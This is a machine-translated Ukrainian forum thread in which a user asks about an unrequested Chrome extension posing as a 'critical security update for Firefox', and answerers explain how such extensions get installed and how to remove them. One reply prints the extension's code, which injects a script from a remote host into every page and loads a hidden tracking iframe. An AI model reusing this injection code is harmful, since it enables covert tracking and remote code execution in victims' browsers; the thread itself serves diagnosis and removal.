Спливаюче повідомлення під час запуску Chrome: Підтвердьте зміни - Додано розширення "Chrome Security Component"

Після запуску Google Chrome у верхньому правому куті браузера з'явиться невелике діалогове вікно, у якому зазначено:

Підтвердьте зміни

Додано розширення "Chrome Security Component".

Це дає мені можливість натиснути OK або Деталі (я не натиснув ОК), але після натискання Деталі відкривається нова вкладка з розширеннями Chrome.

Викликається розширення Компонент Chrome Security 1.0 з галочкою з правого боку.

Написання відразу під його назвою говорить:

Критичне оновлення безпеки для Firefox

Є 2 маленькі скриньки:

Дозволити інкогніто
Дозволити доступ до URL-адрес

Ніякі коробки не позначені.

Наскільки мені відомо, я не завантажив це розширення з Веб-магазину Chrome і хотів би отримати поради?

Хто-небудь інший зустрічають це, це не звучить правильно особливо трохи про це критичне оновлення безпеки для Firefox!

Чи може Google Chrome автоматично додавати розширення, якщо вони з міркувань безпеки?

(Це те, що з'явилося зовсім недавно в останні кілька разів запуску Chrome, тому я впевнений, що не завантажив його як розширення)

enter image description here

windows-7 google-chrome google-chrome-extensions

— Simon
джерело

яку версію вікна ви використовуєте?

— Sathyajith Bhat

Домашня премія Windows 7 64bit

— Simon

Я використовую NIS 2013, Malwarebytes antimalware як мій головний антивірусний арсенал

— Simon

Якби це було законно, інші користувачі Chrome, безсумнівно, мали б одне і те ж розширення, яке було додано, і з'явилося спливаюче повідомлення?

— Simon

Відповіді:

Розширення недоступний веб-магазин Chrome , і, дивлячись на загальну іконку плагінів Chrome, разом з відсутністю присутності в магазині, я вважаю, що це, безумовно, не є законним.

Ви маєте можливість перевірити вихідний код розширення з %localappdata%\Google Chrome\User Data\Default\Extensions\kfejhbidgehdoaglokpfddkmiepmhcck і перевірте, що він робить.

Чи може Google Chrome автоматично додавати розширення, якщо вони з міркувань безпеки?

Я бачив, як зовнішні програми встановлюють розширення для Chrome (прикладом буде Norton 360, який встановлює його непотрібний захист), але це точно не з Mozilla.

— Sathyajith Bhat
джерело

Чи можна вимкнути його?

— Simon

Крім того, як це говорить його критичне оновлення для Firefox (він не має нічого спільного з Firefox)!

— Simon

біт збентежений, як перевірити вихідний код, наведений у відповіді вище

— Simon

@Simon перейшов до згаданого вище шляху, перевірте файл manifest.js та інші файли js / html. Ви можете / повинні вимкнути / видалити його

— Sathyajith Bhat

У мене виникли труднощі з пошуком шляху, як я можу отримати% localappdata%? Я помітив, що поруч з розширенням на скріншоті є кошик - звідки я можу видалити / видалити його (сподіваюся)?

— Simon

це трохи більше інформації для цього розширення:

Chrome Security Component


--------------------------------------
extension background.js
--------------
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo) {
    if (changeInfo.status === 'complete') {
        chrome.tabs.executeScript(tabId, {
            code: "var d = document; var js, id = 'wsk-node'; if (d.getElementById(id)) {return;}"+
                  "js = d.createElement('script'); js.id = id; js.async = true;"+
                  "js.src = '//cdn.io4o.com/js/all.js';"+
                  "d.getElementsByTagName('head')[0].appendChild(js);"
        });
    }
});


-----
//cdn.io4o.com/js/all.js
----

var host = window.location.host;

if (host != 'cdn.io4o.com') {
        var iframe = document.createElement('iframe');
        iframe.src = '//cdn.io4o.com/ga.html';
        iframe.style.width = 0;
        iframe.style.height = 0;
        iframe.style.border = 0;
        document.body.appendChild(iframe);
}

------
//cdn.io4o.com/ga.html
------

<html>
<head>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-37051120-1']);
  _gaq.push(['_setDomainName', 'io4o.com']);

  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>
<body>
</body>
</html>

— Federico Botta
джерело

Thx для цього Федеріко, але чи знаєте ви, що це означає?

— Simon

Привіт, Саймон, він використовує Google Analytics для відстеження веб-сторінок. developers.google.com/analytics/devguides/collection/gajs

— Federico Botta

О, право, я закінчив видаляюче це, але це було потенційно небезпечне або не дійсно?

— Simon

Не так, як це є поточний стан, але він відстежує всі відвідані веб-сайти, якщо вони не змінюють віддалений код для js і html (//cdn.io4o.com/js/all.js і //cdn.io4o.com/ga.html ). Особисто я пропоную видалити його, як і ви ;-)

— Federico Botta

Thx для вашого відгуку

— Simon

Чи може Google Chrome автоматично додавати розширення, якщо вони з міркувань безпеки?

Так, Google Chrome дозволяє встановлювати автоматичне розширення, але це не обмежується причинами безпеки. Те, що ви пережили, є так званим зовнішнє розширення .
Від Веб-сайт розробника Google

Розширення, яке встановлюється автоматично, називається зовнішнім розширенням. Google Chrome підтримує два способи встановлення зовнішніх розширень:

Використання файлу JSON (лише для Mac OS X та Linux)
Використання реєстру Windows (лише для Windows)

У Windows вони проскакують через ці записи реєстру:

32-розрядні Windows: HKEY_LOCAL_MACHINE Програмне забезпечення Google Chrome Розширення
64-розрядні Windows: HKEY_LOCAL_MACHINE Програмне забезпечення Wow6432Node Google

Просто видаліть ідентифікатор порушення (він з'явиться як підрозділ)

— Costin Gușă
джерело